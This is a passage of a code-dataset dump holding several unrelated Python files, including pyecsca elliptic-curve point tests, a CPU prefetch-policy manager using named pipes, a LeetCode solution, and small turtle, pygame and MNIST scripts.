maxs={\"x\":[],\"y\":[],\"z\":[]}\n for i in range(len(x_t)):\n x, y, z = x_t[i,:,:].T\n mins[\"x\"]+=[min(x)]\n maxs[\"x\"]+=[max(x)]\n mins[\"y\"]+=[min(y)]\n maxs[\"y\"]+=[max(y)]\n mins[\"z\"]+=[min(z)]\n maxs[\"z\"]+=[max(z)]\n # prepare the axes limits\n ax.set_xlim((min(mins[\"x\"]),max(maxs[\"x\"])))\n ax.set_ylim((min(mins[\"y\"]),max(maxs[\"y\"])))\n ax.set_zlim((min(mins[\"z\"]),max(maxs[\"z\"])))\n\n for i in range(numberOfTrajectories):\n x, y, z = x_t[i,:,:].T\n lines = ax.plot(x, y, z, '-', c=colors[i])\n plt.setp(lines, linewidth=1)\n\n ax.view_init(angley, anglex)\n plt.show()\n\n return t, x_t","sub_path":"chuaSystem.py","file_name":"chuaSystem.py","file_ext":"py","file_size_in_byte":2275,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"476069818","text":"from unittest import 
TestCase\n\nfrom pyecsca.ec.coordinates import AffineCoordinateModel\nfrom pyecsca.ec.params import get_params\nfrom pyecsca.ec.mod import Mod\nfrom pyecsca.ec.model import ShortWeierstrassModel, MontgomeryModel\nfrom pyecsca.ec.point import Point, InfinityPoint\n\n\nclass PointTests(TestCase):\n def setUp(self):\n self.secp128r1 = get_params(\"secg\", \"secp128r1\", \"projective\")\n self.base = self.secp128r1.generator\n self.coords = self.secp128r1.curve.coordinate_model\n self.affine = AffineCoordinateModel(ShortWeierstrassModel())\n\n def test_construction(self):\n with self.assertRaises(ValueError):\n Point(self.coords)\n\n def test_to_affine(self):\n pt = Point(\n self.coords,\n X=Mod(0x161FF7528B899B2D0C28607CA52C5B86, self.secp128r1.curve.prime),\n Y=Mod(0xCF5AC8395BAFEB13C02DA292DDED7A83, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n affine = pt.to_affine()\n\n self.assertIsInstance(affine.coordinate_model, AffineCoordinateModel)\n self.assertSetEqual(set(affine.coords.keys()), set(self.affine.variables))\n self.assertEqual(affine.coords[\"x\"], pt.coords[\"X\"])\n self.assertEqual(affine.coords[\"y\"], pt.coords[\"Y\"])\n self.assertEqual(affine.to_affine(), affine)\n\n affine = InfinityPoint(self.coords).to_affine()\n self.assertIsInstance(affine, InfinityPoint)\n\n def test_to_model(self):\n affine = Point(\n self.affine,\n x=Mod(0xABCD, self.secp128r1.curve.prime),\n y=Mod(0xEF, self.secp128r1.curve.prime),\n )\n projective_model = self.coords\n other = affine.to_model(projective_model, self.secp128r1.curve)\n\n self.assertEqual(other.coordinate_model, projective_model)\n self.assertSetEqual(set(other.coords.keys()), set(projective_model.variables))\n self.assertEqual(other.coords[\"X\"], affine.coords[\"x\"])\n self.assertEqual(other.coords[\"Y\"], affine.coords[\"y\"])\n self.assertEqual(other.coords[\"Z\"], Mod(1, self.secp128r1.curve.prime))\n\n infty = InfinityPoint(AffineCoordinateModel(self.secp128r1.curve.model))\n other_infty = infty.to_model(self.coords, self.secp128r1.curve)\n self.assertIsInstance(other_infty, InfinityPoint)\n\n with self.assertRaises(ValueError):\n self.base.to_model(self.coords, self.secp128r1.curve)\n\n def test_to_from_affine(self):\n pt = Point(\n self.coords,\n X=Mod(0x161FF7528B899B2D0C28607CA52C5B86, self.secp128r1.curve.prime),\n Y=Mod(0xCF5AC8395BAFEB13C02DA292DDED7A83, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n other = pt.to_affine().to_model(self.coords, self.secp128r1.curve)\n self.assertEqual(pt, other)\n\n def test_equals(self):\n pt = Point(\n self.coords,\n X=Mod(0x4, self.secp128r1.curve.prime),\n Y=Mod(0x6, self.secp128r1.curve.prime),\n Z=Mod(2, self.secp128r1.curve.prime),\n )\n other = Point(\n self.coords,\n X=Mod(0x2, self.secp128r1.curve.prime),\n Y=Mod(0x3, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n third = Point(\n self.coords,\n X=Mod(0x5, self.secp128r1.curve.prime),\n Y=Mod(0x3, self.secp128r1.curve.prime),\n Z=Mod(1, self.secp128r1.curve.prime),\n )\n self.assertTrue(pt.equals(other))\n self.assertNotEqual(pt, other)\n self.assertFalse(pt.equals(2))\n self.assertNotEqual(pt, 2)\n self.assertFalse(pt.equals(third))\n self.assertNotEqual(pt, third)\n self.assertTrue(pt.equals_scaled(other))\n self.assertTrue(pt.equals_affine(other))\n self.assertFalse(pt.equals_scaled(third))\n\n infty_one = InfinityPoint(self.coords)\n infty_other = InfinityPoint(self.coords)\n self.assertTrue(infty_one.equals(infty_other))\n 
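# All equality notions (equals, equals_affine, equals_scaled and ==) agree for two InfinityPoints of the same coordinate model.\n        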
self.assertTrue(infty_one.equals_affine(infty_other))\n self.assertTrue(infty_one.equals_scaled(infty_other))\n self.assertEqual(infty_one, infty_other)\n self.assertFalse(pt.equals(infty_one))\n self.assertFalse(pt.equals_affine(infty_one))\n self.assertFalse(pt.equals_scaled(infty_one))\n\n mont = MontgomeryModel()\n different = Point(\n mont.coordinates[\"xz\"],\n X=Mod(\n 0x64DACCD2656420216545E5F65221EB,\n 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA,\n ),\n Z=Mod(1, 0xAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA),\n )\n self.assertFalse(pt.equals(different))\n self.assertNotEqual(pt, different)\n\n def test_bytes(self):\n pt = Point(\n self.coords,\n X=Mod(0x4, self.secp128r1.curve.prime),\n Y=Mod(0x6, self.secp128r1.curve.prime),\n Z=Mod(2, self.secp128r1.curve.prime),\n )\n self.assertEqual(\n bytes(pt),\n b\"\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x04\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x06\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x00\\x02\",\n )\n self.assertEqual(bytes(InfinityPoint(self.coords)), b\"\\x00\")\n\n def test_iter(self):\n pt = Point(\n self.coords,\n X=Mod(0x4, self.secp128r1.curve.prime),\n Y=Mod(0x6, self.secp128r1.curve.prime),\n Z=Mod(2, self.secp128r1.curve.prime),\n )\n t = tuple(pt)\n self.assertEqual(len(t), 3)\n self.assertEqual(len(pt), 3)\n","sub_path":"test/ec/test_point.py","file_name":"test_point.py","file_ext":"py","file_size_in_byte":5712,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"452298395","text":"#!/usr/bin/python\n\nimport os\nimport struct\nimport locale\nimport fcntl\nimport time\n\nimport subprocess\nimport sys\n\nfrom optparse import OptionParser\nfrom io import BlockingIOError\n\ndef enum(**enums):\n return type('Enum', (), enums)\n\nENUMS = enum(PRT_COMM_SEND=1, PRT_COMM_RECV=2, \\\n HWPF_ON=0, LLC_HWPF_OFF=1, HWPF_OFF=2, \\\n SWPF_8MBLLC=1, SWPF_6MBLLC=2, SWPF_4MBLLC=3, \\\n SWPF_2MBLLC=4, SWPF_1MBLLC=5, SWPF_0MBLLC=6, SWPF_JIT_ACTIVE=7,\\\n NO_REVERT_TO_PREV=0, REVERT_TO_PREV=1, REVERT_TO_ORIG=2)\n\n#4:[\"hwpf\", \"swpf\", \"l1hwpfswpf\", \"hwpfswpf\", \"nopref\"],\n#3:[\"hwpf\", \"l1hwpfswpf\", \"swpf\", \"hwpfswpf\"]\nEXP_PLAN = {4:[\"hwpf\", \"swpf\", \"l1hwpfswpf\", \"hwpfswpf\"], \\\n 3:[\"hwpf\", \"l1hwpfswpf\", \"swpf\"], \\\n 2:[\"hwpf\", \"hwpfswpf\", \"swpf\", \"l1hwpfswpf\"],\\\n 1:[\"hwpf\", \"hwpfswpf\", \"l1hwpfswpf\"]}\n\nPERF_BOOK = {\"hwpf\":1}\n\nAVG_PERF_BOOK = {}\nMON_WIN_BOOK = {}\n\nclass Conf:\n def __init__(self):\n \n parser = OptionParser(\"usage: %prog [OPTIONS...] INFILE\")\n \n parser.add_option(\"-b\", \"--buf-size\",\n type=\"int\", default=\"52\",\n dest=\"BUF_SIZE\",\n help=\"Size of structure communicated between runtime and policy manager\")\n parser.add_option(\"-n\", \"--num-apps\",\n type=\"int\", default=\"4\",\n dest=\"NUM_APPS\",\n help=\"Number of active cores. 
Total applications running\")\n parser.add_option(\"-s\", \"--sleep\",\n type=\"float\", default=\"0.05\",\n dest=\"SLEEP_TIME\",\n help=\"Sleep time in milli-seconds\")\n parser.add_option(\"-r\", \"--reexplore-in\",\n type=\"int\", default=\"5\",\n dest=\"REEXP_TIME\",\n help=\"Start re-exploration of best prefetch policy in XXX seconds\")\n parser.add_option(\"-p\", \"--rep-reexplore\",\n type=\"int\", default=\"10\",\n dest=\"REP_REEXP\",\n help=\"Repead re-exploration this many times\")\n parser.add_option(\"-w\", \"--num-mon-win\",\n type=\"int\", default=\"10\",\n dest=\"NUM_MON_WIN\",\n help=\"Number of performance windows to monitor for each policy\")\n parser.add_option(\"-e\", \"--mon-epoch\",\n type=\"float\", default=\"0.5\",\n dest=\"MON_EPOCH\",\n help=\"Duration of monitor epoch for each policy\")\n parser.add_option(\"-x\", \"--exit-after\",\n type=\"int\", default=\"65\",\n dest=\"EXIT_AFTER\",\n help=\"Exit after XXX seconds of applying the optimal policy\")\n parser.add_option(\"-t\", \"--retries\",\n type=\"int\", default=\"5\",\n dest=\"RETRIES\",\n help=\"Number of retries to important prefetch policies\")\n\n (opts, args) = parser.parse_args()\n \n \n self.STRUCT_FMTSTR=\"iiiiifffffiii\"\n self.ENABLED_SWPF = False\n self.curr_policy=\"hwpf\"\n self.baseline = \"hwpf\"\n self.max_perf_policy=\"hwpf\"\n self.max_thruput=1.0\n self.start_time = time.time()\n\n self.BUF_SIZE = opts.BUF_SIZE\n self.NUM_APPS = opts.NUM_APPS\n self.SLEEP_TIME = opts.SLEEP_TIME\n self.REEXP_TIME = opts.REEXP_TIME\n self.NUM_MON_WIN = opts.NUM_MON_WIN\n self.EXIT_AFTER= opts.EXIT_AFTER\n self.RETRIES = opts.RETRIES\n self.REP_REEXP = opts.REP_REEXP\n self.MON_EPOCH = opts.MON_EPOCH\n self.REEXP_FAIL_THR = 5\n self.reexp_fail_count = 0\n self.curr_ws = 1\n self.falsepos_count = 0\n self.falsepos_thr= 3\n self.win_policies = []\n self.backoff_reexp_time = self.REEXP_TIME\n self.MON_BASELINE_AFTER_ITER = 4\n self.mon_baseline_after = self.MON_BASELINE_AFTER_ITER\n\n self.rp = os.open(\"/tmp/PRT_POL_MAN_RECV\", os.O_RDONLY)\n fl = fcntl.fcntl(self.rp, fcntl.F_GETFL)\n fcntl.fcntl(self.rp, fcntl.F_SETFL, fl | os.O_NONBLOCK)\n\n self.rp_app = []\n self.wp = []\n \n for core_idx in range(self.NUM_APPS):\n \n self.rp_app.append(os.open(\"/tmp/PRT_SND_INFO_%d\"%(core_idx), os.O_RDONLY))\n self.wp.append(os.open(\"/tmp/PRT_RECV_INFO_%d\"%(core_idx), os.O_WRONLY ))\n \n fl = fcntl.fcntl(self.rp_app[core_idx], fcntl.F_GETFL)\n fcntl.fcntl(self.rp_app[core_idx], fcntl.F_SETFL, fl | os.O_NONBLOCK)\n \n fl = fcntl.fcntl(self.wp[core_idx], fcntl.F_GETFL)\n fcntl.fcntl(self.wp[core_idx], fcntl.F_SETFL, fl | os.O_NONBLOCK)\n\ndef nonblocking_readlines(fd, conf):\n\n os.lseek(fd, 0, os.SEEK_SET)\n\n buf = bytearray()\n remaining_bytes = conf.BUF_SIZE\n \n while remaining_bytes > 0:\n try:\n block = os.read(fd, conf.BUF_SIZE) #read BUF_SIZE-byte chunks at a time\n #deleteContent(fd)\n except BlockingIOError:\n None\n \n remaining_bytes -= len(block)\n \n #print >> sys.stderr, \"data is %d Bytes\"%(len(block))\n \n if not block:\n if buf:\n buf.clear()\n return None\n \n buf.extend(block)\n\n if remaining_bytes > 0:\n time.sleep(conf.SLEEP_TIME)\n \n return buf\n\ndef send_data(fd, snd_data):\n deleteContent(fd)\n os.write(fd, snd_data)\n\ndef deleteContent(fd):\n os.ftruncate(fd, 0)\n os.lseek(fd, 0, os.SEEK_SET)\n\ndef compute_weighted_speedup(bpc_list, conf):\n\n hwpf_bpc_list = AVG_PERF_BOOK[\"hwpf\"]\n ws = 0.0\n\n for idx in range(conf.NUM_APPS):\n ws += float(bpc_list[idx])/float(hwpf_bpc_list[idx])\n\n 
return float(ws)/float(conf.NUM_APPS)\n\ndef monitor_perf(policy, mon_time, conf):\n\n print >> sys.stderr, \"POLMAN -- monitoring performance for policy %s\"%(policy)\n\n i=0\n\n core_id = [0,1,2,3]\n bpc = [0,0,0,0]\n \n num_mon_wins = mon_time / conf.SLEEP_TIME\n\n while i < num_mon_wins: #conf.NUM_MON_WIN:\n\n data = nonblocking_readlines(conf.rp, conf)\n \n if not data:\n continue\n \n (comm_type, core0, core1, core2, core3, bpc0, bpc1, bpc2, bpc3, sys_bw, hwpf_status, swpf_status, revert) = struct.unpack(conf.STRUCT_FMTSTR, data)\n\n bpc[0] += bpc0\n bpc[1] += bpc1\n bpc[2] += bpc2\n bpc[3] += bpc3\n \n #print >> sys.stderr, \"%f -- %f %f %f %f\"%(time.time()-conf.start_time, bpc0, bpc1, bpc2, bpc3)\n \n i += 1\n time.sleep(conf.SLEEP_TIME)\n\n #revert immediately do default once performance has been recorded\n #if policy != \"hwpf\":\n # ready_this_policy(\"hwpf\", conf)\n\n #average recorded bpc\n for idx in range(conf.NUM_APPS):\n bpc[idx] = float(bpc[idx])/float(num_mon_wins)#conf.NUM_MON_WIN)\n #print >> sys.stderr, \"bpc[%d] -- %f\"%(idx,bpc[idx])\n\n if policy in AVG_PERF_BOOK:\n for idx in range(conf.NUM_APPS):\n #if policy == conf.baseline:\n if bpc[idx] > 0:\n AVG_PERF_BOOK[policy][idx] = float(AVG_PERF_BOOK[policy][idx]+bpc[idx])/float(2)\n #else:\n #AVG_PERF_BOOK[policy][idx] += bpc[idx]\n else:\n AVG_PERF_BOOK[policy] = bpc\n\ndef wait_for_JIT(conf, revert):\n\n print >> sys.stderr, \"POLMAN -- Waiting for %d JIT instances to complete\"%(len(conf.rp_app))\n \n for fd in conf.rp_app:\n while True:\n data = nonblocking_readlines(fd, conf)\n if not data:\n time.sleep(conf.SLEEP_TIME)\n continue\n (comm_type, core0, core1, core2, core3, bpc0, bpc1, bpc2, bpc3, sys_bw, hwpf_status, swpf_status, revert_status) = struct.unpack(conf.STRUCT_FMTSTR, data)\n \n if not revert and swpf_status == ENUMS.SWPF_JIT_ACTIVE:\n break\n elif revert and swpf_status == 0:\n break\n time.sleep(conf.SLEEP_TIME)\n\ndef wait_for_hwpf_throttle(hwpf_change_to, conf):\n\n print >> sys.stderr, \"POLMAN -- waiting for HWPF to change to %d\"%(hwpf_change_to)\n\n fd = conf.rp\n\n while True:\n data = nonblocking_readlines(fd, conf)\n if not data:\n time.sleep(conf.SLEEP_TIME)\n continue\n (comm_type, core0, core1, core2, core3, bpc0, bpc1, bpc2, bpc3, sys_bw, hwpf_status, swpf_status, revert) = struct.unpack(conf.STRUCT_FMTSTR, data)\n \n if hwpf_status == hwpf_change_to:\n break\n time.sleep(conf.SLEEP_TIME)\n\ndef ready_this_policy(policy, conf):\n\n print >> sys.stderr, \"\\n----------------------------\"\n print >> sys.stderr, \"POLMAN -- readying policy %s\"%(policy)\n \n \n conf.ENABLED_SWPF = False\n\n hwpf_change_to = ENUMS.HWPF_ON\n\n if policy == \"hwpf\":\n \n rev = ENUMS.REVERT_TO_ORIG\n if conf.curr_policy == \"hwpf\" or conf.curr_policy == \"nopref\":\n rev = ENUMS.NO_REVERT_TO_PREV\n \n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_ON, 0, rev)\n elif policy == \"swpf\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_OFF, ENUMS.SWPF_8MBLLC, ENUMS.NO_REVERT_TO_PREV)\n \n hwpf_change_to = ENUMS.HWPF_OFF\n\n elif policy == \"l1hwpfswpf\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.LLC_HWPF_OFF, ENUMS.SWPF_8MBLLC, ENUMS.NO_REVERT_TO_PREV)\n\n hwpf_change_to = ENUMS.LLC_HWPF_OFF\n\n elif policy == \"hwpfswpf\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 
0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_ON, ENUMS.SWPF_8MBLLC, ENUMS.NO_REVERT_TO_PREV)\n\n hwpf_change_to = ENUMS.HWPF_ON\n\n elif policy == \"nopref\":\n snd_data = struct.pack(\"iiiiifffffiii\", ENUMS.PRT_COMM_RECV, 0, 1, 2, 3, \\\n 0.0, 0.0, 0.0, 0.0, 0.0, \\\n ENUMS.HWPF_OFF, 0, ENUMS.REVERT_TO_ORIG)\n\n hwpf_change_to = ENUMS.HWPF_OFF\n \n for fd in conf.wp:\n send_data(fd, snd_data)\n\n revert = False\n if (conf.curr_policy == \"hwpf\" or conf.curr_policy == \"nopref\") and policy != conf.curr_policy:\n conf.ENABLED_SWPF = True\n elif (conf.curr_policy != \"hwpf\" and conf.curr_policy != \"nopref\") and (policy == \"hwpf\" or policy == \"nopref\"):#policy != conf.curr_policy:\n revert = True\n\n if conf.ENABLED_SWPF:\n wait_for_JIT(conf, revert)\n elif revert:\n wait_for_JIT(conf, revert)\n\n wait_for_hwpf_throttle(hwpf_change_to, conf)\n\n conf.curr_policy = policy\n\n print >> sys.stderr, \"POLMAN -- policy %s is ready on all cores at %f seconds\"%(policy, time.time() - conf.start_time)\n\ndef reset_AVG_PERF_BOOK():\n \n return\n for policy in AVG_PERF_BOOK:\n #if policy == \"hwpf\":\n # continue\n AVG_PERF_BOOK[policy] = [0.0, 0.0, 0.0, 0.0]\n\ndef reexplore_winning(conf):\n \n print >> sys.stderr, \"POLMAN -- starting Re-exploration at %f seconds\"%(time.time() - conf.start_time)\n\n curr_max_perf_policy = conf.max_perf_policy\n\n explore_policies(conf)\n\n if curr_max_perf_policy == conf.max_perf_policy:\n conf.backoff_reexp_time += conf.REEXP_TIME\n else:\n conf.backoff_reexp_time = conf.REEXP_TIME\n\n conf.REP_REEXP -= 1\n\ndef explore_policies(conf):\n\n total_states = len(EXP_PLAN[conf.NUM_APPS])\n\n num_mon_wins = int(conf.MON_EPOCH / conf.SLEEP_TIME)\n\n conf.max_perf_policy = conf.baseline\n conf.max_thruput = 1.0\n \n retries = 0\n \n while retries < conf.RETRIES:\n \n reset_AVG_PERF_BOOK()\n \n for rep_idx in range(num_mon_wins):\n \n for exp_plan_idx in range(total_states):\n \n policy = EXP_PLAN[conf.NUM_APPS][exp_plan_idx]\n ready_this_policy(policy, conf)\n monitor_perf(EXP_PLAN[conf.NUM_APPS][exp_plan_idx], conf.SLEEP_TIME, conf)\n \n for policy in EXP_PLAN[conf.NUM_APPS]:\n \n if policy == conf.baseline:\n continue\n \n bpc_list = AVG_PERF_BOOK[policy]\n ws = compute_weighted_speedup(bpc_list, conf)\n PERF_BOOK[policy] = ws\n \n if ws > conf.max_thruput:\n conf.max_thruput = ws\n conf.max_perf_policy = policy\n\n print >> sys.stderr, \"policy %s -- weighted speedup %f\"%(policy, ws)\n \n retries += 1\n if conf.max_perf_policy != conf.baseline:\n break\n \n# for test_policy in EXP_PLAN[conf.NUM_APPS]:\n#\n# retries = 0\n# exp_list = [conf.baseline, test_policy]\n#\n# while retries < conf.RETRIES:\n#\n# reset_AVG_PERF_BOOK()\n#\n# for rep_idx in range(num_mon_wins):\n#\n# for policy in exp_list:\n# ready_this_policy(policy, conf)\n# monitor_perf(policy, conf.SLEEP_TIME, conf)\n# \n# bpc_list = AVG_PERF_BOOK[test_policy]\n# ws = compute_weighted_speedup(bpc_list, conf)\n# PERF_BOOK[test_policy] = ws\n# \n# if ws > conf.max_thruput:\n# conf.max_thruput = ws\n# conf.max_perf_policy = test_policy\n# \n# print >> sys.stderr, \"policy %s -- weighted speedup %f\"%(policy, ws)\n#\n# retries += 1\n# if conf.max_perf_policy == test_policy:\n# break\n\n conf.curr_ws = conf.max_thruput\n\ndef monitor_best_policy(conf):\n\n mon_list = [conf.max_perf_policy] #[conf.baseline, conf.max_perf_policy]\n\n if conf.mon_baseline_after == 0:\n mon_list = [conf.baseline, conf.max_perf_policy]\n conf.mon_baseline_after = conf.MON_BASELINE_AFTER_ITER\n\n 
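# Re-measure the baseline every MON_BASELINE_AFTER_ITER iterations so the speedup reference stays current.\n    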
reset_AVG_PERF_BOOK()\n    \n    for policy in mon_list:\n        \n        ready_this_policy(policy, conf)\n        monitor_perf(policy, conf.MON_EPOCH, conf)\n\n    bpc_list = AVG_PERF_BOOK[conf.max_perf_policy]\n    ws = compute_weighted_speedup(bpc_list, conf)\n    PERF_BOOK[conf.max_perf_policy] = ws\n    \n    if ws > conf.max_thruput:\n        conf.max_thruput = ws\n    \n    conf.curr_ws = ws\n\n    if conf.curr_ws < 1.0:\n        conf.falsepos_count += 1\n    else:\n        conf.falsepos_count -= 1\n\n#    ready_this_policy(conf.max_perf_policy, conf)\n\n    conf.mon_baseline_after -= 1\n\n    print >> sys.stderr, \"policy %s -- weighted speedup %f -- falsepos_count %d\"%(policy, ws, conf.falsepos_count)\n\ndef main():\n    \n    start_time = time.time()\n    \n    time.sleep(1)\n    conf = Conf()\n    conf.start_time = start_time\n    #ignore the first 10 seconds\n    time.sleep(9)\n\n    exp_plan_idx = 0\n\n    total_states = len(EXP_PLAN[conf.NUM_APPS])\n\n    while True:\n        \n        print >> sys.stderr, \"POLMAN -- entering exploration phase\"\n        \n        time.sleep(conf.SLEEP_TIME) # sleep for 100 milli-seconds -- 2X the protean runtime\n        \n        #retries = 0\n        #while retries < conf.RETRIES and conf.max_perf_policy != policy:\n        explore_policies(conf)\n\n        #apply policy with max performance\n        print >> sys.stderr, \"POLMAN -- Applying best prefetching policy: %s\"%(conf.max_perf_policy)\n        ready_this_policy(conf.max_perf_policy, conf)\n\n        #conf.RETRIES = 3\n\n        time_passed = time.time() - conf.start_time\n\n        re_explore_in = conf.REEXP_TIME + time_passed\n\n        while conf.EXIT_AFTER > time_passed:\n\n            print >> sys.stderr, \"POLMAN -- re-explore in %f\"%(re_explore_in - time_passed)\n            \n            if (re_explore_in - time_passed) < 0.1 and conf.REP_REEXP > 0:\n                reexplore_winning(conf)\n                #apply policy with max performance\n                print >> sys.stderr, \"POLMAN -- Applying best prefetching policy after re-exploration: %s\"%(conf.max_perf_policy)\n                ready_this_policy(conf.max_perf_policy, conf)\n                time_passed = time.time() - conf.start_time\n                re_explore_in = conf.backoff_reexp_time + time_passed\n                conf.falsepos_count = 0\n            \n            if conf.curr_policy != conf.baseline:\n                monitor_best_policy(conf)\n                \n                #If too many false positives occur, revert to baseline policy\n                if conf.falsepos_count == conf.falsepos_thr:\n                    conf.reexp_fail_count += 1\n                    ready_this_policy(conf.baseline, conf)\n                    if conf.reexp_fail_count == conf.REEXP_FAIL_THR:\n                        print >> sys.stderr, \"POLMAN -- Abandoning exploration...\"\n                        break\n                    conf.falsepos_count = 0\n                    re_explore_in = time_passed + 0 # restart re-exploration immediately\n                    print >> sys.stderr, \"POLMAN -- Reverting to baseline policy: %s -- optimization failed %d\"%(conf.baseline, conf.reexp_fail_count)\n                    print >> sys.stderr, \"POLMAN -- Starting Re-exploration soon...\"\n            else:\n                sleep_for = re_explore_in - time_passed\n                if sleep_for > 0:\n                    time.sleep(sleep_for)\n                #break\n\n            if conf.REP_REEXP == 0:\n                break\n\n            time_passed = time.time() - conf.start_time\n\n        break\n\n\nif __name__ == '__main__':\n    main()\n","sub_path":"pol_man_inter.py","file_name":"pol_man_inter.py","file_ext":"py","file_size_in_byte":17919,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"444166586","text":"# 66. 
Plus One\n# Given a non-empty array of digits representing a non-negative integer, increment the integer by one.\n# The most significant digit is at the head of the array, and each element stores a single digit.\n# You may assume the integer does not contain any leading zero, except for the number 0 itself.\n\nfrom typing import List\n\nclass Solution:\n    def plusOne(self, digits: List[int]) -> List[int]:\n        # count = 0\n        # # keep the count of leading zeros: [0,0] -> [0,1]\n        # for i in range(len(digits)-1):\n        #     if digits[i]:\n        #         break\n        #     count += 1\n        # num = int(\"\".join([str(x) for x in digits])) + 1\n        # return [0] * count + [int(x) for x in list(str(num))]\n        \n        # carry over each trailing 9; time: best O(1), worst O(n); space: O(1)\n        digits = [0] + digits\n        for i in range(len(digits)-1,-1,-1):\n            if digits[i] != 9:\n                digits[i] += 1\n                break\n            else:\n                digits[i] = 0\n        if digits[0] == 0:\n            return digits[1:] \n        else:\n            return digits","sub_path":"Week_01/plusOne.py","file_name":"plusOne.py","file_ext":"py","file_size_in_byte":1048,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"251224568","text":"#!python\n# -*- coding: utf-8 -*-\nimport traceback\nimport os\nimport json\nimport time\n\nimport numpy as np\nfrom sklearn import metrics\nimport model\n\ndef main():\n    '''Load test data and call the model's predict function.\n    '''\n    X_test = np.load('X_test.npy')\n    y_test = np.load('y_test.npy')\n    start_time = time.time()\n    y_predict = model.predict(X_test)\n    elapsed_time = time.time() - start_time # in seconds\n    acc = metrics.accuracy_score(y_test, y_predict)\n    return {'time': elapsed_time, 'acc': acc}\nif __name__==\"__main__\":\n    try:\n        result_json = main()\n    except Exception as err:\n        print('Your code failed to run. Reason :')\n        print(err)\n        traceback.print_tb(err.__traceback__)\n        exit(-1)\n    result_str = json.dumps(result_json)\n    with open('model/result.txt', 'w') as f:\n        f.write(result_str)\n","sub_path":"mnist/run.py","file_name":"run.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"404153002","text":"# -*- coding: utf-8 -*-\r\n\"\"\"\r\nCreated on Sat Feb 9 18:14:14 2019\r\n\r\n@author: Administrator\r\n\"\"\"\r\nimport turtle\r\nimport time\r\n\r\nturtle.setup(width=0.5,height=0.7)\r\nturtle.screensize(50,50,\"purple\")\r\nturtle.pensize(5)\r\nturtle.speed(1)\r\nturtle.pencolor(\"yellow\")\r\nturtle.fillcolor(\"blue\")\r\nturtle.shape(\"turtle\")\r\n\r\nturtle.begin_fill()\r\n\r\nfor _ in range(7):\r\n    turtle.forward(250)\r\n    turtle.right(102.86)\r\nturtle.end_fill()\r\ntime.sleep(2)\r\n\r\nturtle.penup()\r\nturtle.goto(-150,-120)\r\nturtle.color(\"grey\")\r\nturtle.write(\"Done\", font=('Arial', 40, 'normal'))\r\ntime.sleep(1)\r\n\r\nturtle.done()\r\n\r\n","sub_path":"turtle_demo/turtle_七角星.py","file_name":"turtle_七角星.py","file_ext":"py","file_size_in_byte":592,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"533385072","text":"import pygame\n\nclass Zombie(pygame.sprite.Sprite):\n    def __init__(self, direction):\n        # Call the parent class (Sprite) constructor\n        super().__init__()\n        self.image = pygame.Surface([4, 10])\n        if direction == 'left':\n            self.image = pygame.image.load('zombie_right.png').convert_alpha()\n        elif direction == 'right':\n            self.image = pygame.image.load('zombie_left.png').convert_alpha()\n        self.rect = self.image.get_rect()\n        self.direction = direction\n\n\n    def update(self):\n        if self.direction == 'left':\n            self.rect.x += 50\n        elif self.direction == 'right':\n            self.rect.x -= 
50\n","sub_path":"Zombie.py","file_name":"Zombie.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"1"} +{"seq_id":"534523029","text":"import datetime\nimport fcntl\nimport logging\nimport os\nimport pkg_resources\nimport pty\nimport re\nimport selectors\nimport struct\nimport termios\nimport tty\nfrom copy import copy\nfrom functools import partial\nfrom typing import Any, Callable, Dict, Generator, Iterable, Iterator, Tuple, Union\n\nimport pyte\nimport pyte.screens\nfrom Xlib import display, Xatom\nfrom Xlib.error import DisplayError\n\nfrom termtosvg.anim import CharacterCellConfig, CharacterCellLineEvent, CharacterCellRecord\nfrom termtosvg.asciicast import AsciiCastEvent, AsciiCastHeader, AsciiCastTheme\n\nlogger = logging.getLogger(__name__)\nlogger.addHandler(logging.NullHandler())\n\nXRESOURCES_DIR = os.path.join('data', 'Xresources')\n\n\nclass TerminalMode:\n \"\"\"Save terminal state on entry, restore it on exit\"\"\"\n def __init__(self, fileno: int):\n self.fileno = fileno\n self.mode = None\n\n def __enter__(self):\n try:\n self.mode = tty.tcgetattr(self.fileno)\n except tty.error:\n pass\n return self.mode\n\n def __exit__(self, exc_type, exc_val, exc_tb):\n if self.mode is not None:\n tty.tcsetattr(self.fileno, tty.TCSAFLUSH, self.mode)\n\n\ndef record(columns, lines, theme, input_fileno, output_fileno):\n # type: (int, int, Union[AsciiCastTheme, None], int, int) -> Generator[Union[AsciiCastHeader, 